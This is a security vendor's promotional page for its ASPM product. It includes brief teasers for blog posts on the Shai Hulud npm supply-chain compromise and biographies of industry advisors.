Get a demo with your data, test Reachability Analysis and ASPM

Francesco is an internationally renowned public speaker, with multiple interviews in high-profile publications (eg. Forbes), and an author of numerous books and articles, who utilises his platform to evangelize the importance of Cloud security and cutting-edge technologies on a global scale.

Discuss this blog with our community on Slack

Join our AppSec Phoenix community on Slack to discuss this blog and other news with our professional security team

From our Blog

Most enterprises drown in vulnerability data yet starve for attribution. By mapping ownership, location, exposure, and business impact, Phoenix Security’s ASPM turns that swamp into a laser‑focused task list. Only then do three autonomous agents—Researcher, Analyzer, and Remediator—kick in, collaborating to recommend fixes and workflow automation that 10× security‑engineering output. Skip the context and you’ll waste money, requests, tokens, carbon, and human patience on hallucinated advice. For startups, the focus is clear—establish visibility and ensure core security practices are in place. Application Security Posture Management (ASPM) tools provide a straightforward, automated approach to detecting vulnerabilities and enforcing policies. These solutions help reduce risk quickly without overburdening small security teams. Mature organizations, on the other hand, are tackling a different set of problems. With the sheer number of vulnerabilities and an increasingly complicated threat landscape, enterprises need to fine-tune their approach. The goal shifts toward intelligent remediation, leveraging real-time threat intelligence and advanced risk prioritization. ASPM tools at this stage do more than just detect vulnerabilities—they provide context, enable proactive decision-making, and streamline the entire remediation process. The emergence of AI-assisted code generation has further complicated security in both environments. These tools, while speeding up development, are often responsible for introducing new vulnerabilities into applications at a faster pace than traditional methods. The challenge is clear: AI-generated code can hide flaws that are difficult to catch in the rush of innovation. Both startups and enterprises need to adjust their security posture to account for these new risks. ASPM platforms, like Phoenix Security, provide automated scanning of code before it hits production, ensuring that flaws don’t make it past the first line of defense. Meanwhile, organizations are also grappling with the backlog crisis in the National Vulnerability Database (NVD). A staggering number of CVEs remain unprocessed, leaving many businesses with limited data on which to base their patching decisions. While these delays leave companies vulnerable, Phoenix Security steps in by cross-referencing CVE data with known exploits and live threat intelligence, helping organizations stay ahead despite the lag in official vulnerability reporting. Whether just starting their security program or managing a complex infrastructure, organizations need a toolset that adapts with them. Phoenix Security enables businesses of any size to prioritize vulnerabilities based on actual risk, not just theoretical impact, helping security teams navigate the evolving threat landscape with speed and accuracy.
Francesco Cipollone
Shai Hulud weaponised npm’s trust model: stolen maintainer creds, poisoned tarballs, and stealthy GitHub Actions that exfiltrate secrets and persist in CI. 500+ packages were touched in days, starting with @ctrl/tinycolor. This analysis maps the blast radius and delivers a practical remediation plan—pin versions, block direct npm with a proxy, rotate tokens, and strip backdoor workflows—grounded in ASPM and reachability.
Francesco Cipollone
A coordinated npm compromise hit @ctrl/tinycolor and dozens of related packages. The payload auto-trojanizes maintainers’ projects, scans for GitHub/NPM/cloud creds using TruffleHog, plants a backdoor GitHub Actions workflow, and exfiltrates to a webhook. This piece breaks down the attack chain and lays out decisive DevSecOps and ASPM actions to contain and harden.
Francesco Cipollone
Derek

Derek Fisher

Head of product security at a global fintech

Derek Fisher – Head of product security at a global fintech. Speaker, instructor, and author in application security.

Derek is an award winning author of a children’s book series in cybersecurity as well as the author of “The Application Security Handbook.” He is a university instructor at Temple University where he teaches software development security to undergraduate and graduate students. He is a speaker on topics in the cybersecurity space and has led teams, large and small, at organizations in the healthcare and financial industries. He has built and matured information security teams as well as implemented organizational information security strategies to reduce the organizations risk.

Derek got his start in the hardware engineering space where he learned about designing circuits and building assemblies for commercial and military applications. He later pursued a computer science degree in order to advance a career in software development. This is where Derek was introduced to cybersecurity and soon caught the bug. He found a mentor to help him grow in cybersecurity and then pursued a graduate degree in the subject.

Since then Derek has worked in the product security space as an architect and leader. He has led teams to deliver more secure software in organizations from multiple industries. His focus has been to raise the security awareness of the engineering organization while maintaining a practice of secure code development, delivery, and operations.

In his role, Jeevan handles a range of tasks, from architecting security solutions to collaborating with Engineering Leadership to address security vulnerabilities at scale and embed security into the fabric of the organization.

Jeevan Singh

Jeevan Singh

Founder of Manicode Security

Jeevan Singh is the Director of Security Engineering at Rippling, with a background spanning various Engineering and Security leadership roles over the course of his career. He’s dedicated to the integration of security practices into software development, working to create a security-aware culture within organizations and imparting security best practices to the team.
In his role, Jeevan handles a range of tasks, from architecting security solutions to collaborating with Engineering Leadership to address security vulnerabilities at scale and embed security into the fabric of the organization.

James

James Berthoty

Founder of Latio Tech

James Berthoty has over ten years of experience across product and security domains. He founded Latio Tech to help companies find the right security tools for their needs without vendor bias.

christophe

Christophe Parisel

Senior Cloud Security Architect

Senior Cloud Security Architect

Chris

Chris Romeo

Co-Founder
Security Journey

Chris Romeo is a leading voice and thinker in application security, threat modeling, and security champions and the CEO of Devici and General Partner at Kerr Ventures. Chris hosts the award-winning “Application Security Podcast,” “The Security Table,” and “The Threat Modeling Podcast” and is a highly rated industry speaker and trainer, featured at the RSA Conference, the AppSec Village @ DefCon, OWASP Global AppSec, ISC2 Security Congress, InfoSec World and All Day DevOps. Chris founded Security Journey, a security education company, leading to an exit in 2022. Chris was the Chief Security Advocate at Cisco, spreading security knowledge through education and champion programs. Chris has twenty-six years of security experience, holding positions across the gamut, including application security, security engineering, incident response, and various Executive roles. Chris holds the CISSP and CSSLP certifications.

jim

Jim Manico

Founder of Manicode Security

Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. Jim is also the founder of Brakeman Security, Inc. and an investor/advisor for Signal Sciences. He is the author of Iron-Clad Java: Building Secure Web Applications (McGraw-Hill), a frequent speaker on secure software practices, and a member of the JavaOne Rockstar speaker community. Jim is also a volunteer for and former board member of the OWASP foundation.

Join our Mailing list!

Get all the latest news, exclusive deals, and feature updates.

The IKIGAI concept
x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By
ShieldPRO